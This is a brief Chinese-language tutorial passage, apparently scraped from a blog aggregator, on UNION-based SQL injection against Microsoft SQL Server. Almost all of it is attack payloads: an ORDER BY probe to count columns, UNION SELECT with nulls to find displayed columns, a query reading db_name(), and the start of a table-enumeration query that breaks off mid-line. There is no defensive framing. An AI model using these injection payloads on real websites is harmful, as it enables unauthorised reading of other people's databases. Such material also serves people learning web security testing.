sql注入之sqlserver聯合查詢注入

條件: 有顯示位 判斷列數: ?id=1 order by 3 判斷顯示位: ?id=1 union select null,null,null 查看數據庫: ?id=1 union select 1,‘2’,db_name() 這裏注意1,‘2’,db_name()的數據類型必備與數據庫存儲的數據類型一致 查看數據庫有哪些表,U:用戶的表 ?id=1 union select null,name
相關文章
相關標籤/搜索